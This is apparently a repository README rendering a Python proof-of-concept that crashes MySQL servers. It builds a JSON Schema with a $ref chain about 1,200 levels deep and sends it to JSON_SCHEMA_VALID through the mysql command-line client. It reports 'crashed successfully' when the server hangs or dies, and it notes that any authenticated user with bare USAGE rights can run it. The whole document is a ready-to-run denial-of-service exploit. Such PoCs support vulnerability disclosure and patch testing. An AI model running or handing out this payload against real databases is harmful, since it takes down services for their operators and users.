README.md
Rendering markdown...
#!/usr/bin/env python3
"""
MySQL JSON_SCHEMA_VALID DoS PoC — deep linear $ref chain
Triggers excessive recursion while validating a JSON Schema, typically causing
mysqld to hang or crash (availability impact).
Any authenticated client can run this attack. Only USAGE on *.* is required:
no SELECT, no table/column grants, and no elevated SQL roles are needed.
Usage: python3 poc_schema_dos.py [--host HOST] [--port PORT] [--user USER] [--password PASS]
"""
import json
import subprocess
import argparse
DEPTH = 1200 # Crash depth - adjust for MySQL version (8.0.45: ~1100, ASAN: ~500)
def build_crash_schema(n):
"""Build a linear $ref chain of depth n"""
defs = {}
for i in range(n):
defs[f'l{i}'] = {'$ref': f'#/definitions/l{i+1}'}
defs[f'l{n}'] = {'type': 'string'}
return {'$ref': '#/definitions/l0', 'definitions': defs}
def main():
parser = argparse.ArgumentParser(
description='MySQL JSON_SCHEMA_VALID DoS PoC (deep $ref chain)'
)
parser.add_argument('--host', default='127.0.0.1', help='MySQL host')
parser.add_argument('--port', type=int, default=3306, help='MySQL port')
parser.add_argument('--user', default='root', help='MySQL user')
parser.add_argument('--password', default='', help='MySQL password')
args = parser.parse_args()
schema = build_crash_schema(DEPTH)
schema_json = json.dumps(schema)
sql = "SELECT JSON_SCHEMA_VALID('" + schema_json.replace("'", "''") + "', '\"x\"');"
cmd = ['mysql', f'--host={args.host}', f'--port={args.port}', f'--user={args.user}']
if args.password:
cmd.append(f'--password={args.password}')
cmd.append('--execute=' + sql)
print(f"[*] Sending crash payload to {args.user}@{args.host}:{args.port}...")
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=5)
if result.returncode != 0:
# Check if it's a rejection (error message) vs actual crash
stderr_lower = result.stderr.lower()
if "$ref" in stderr_lower and "not supported" in stderr_lower:
print("[!] Target does NOT support $ref keyword - NOT VULNERABLE")
print(f" Error: {result.stderr.strip()}")
elif "function" in stderr_lower and "does not exist" in stderr_lower:
print("[!] Target does NOT have JSON_SCHEMA_VALID() function")
print(f" Error: {result.stderr.strip()}")
print(" Note: JSON_SCHEMA_VALID() requires MySQL 8.0.17+")
elif "timeout" in stderr_lower or "connection" in stderr_lower or not result.stderr.strip():
print("[+] MySQL crashed successfully")
else:
print(f"[!] Query failed: {result.stderr.strip()}")
else:
print("[!] Crash failed or MySQL rejected query")
except subprocess.TimeoutExpired:
print("[+] MySQL crashed successfully (timeout)")
except Exception as e:
print(f"[!] Error: {e}")
if __name__ == "__main__":
main()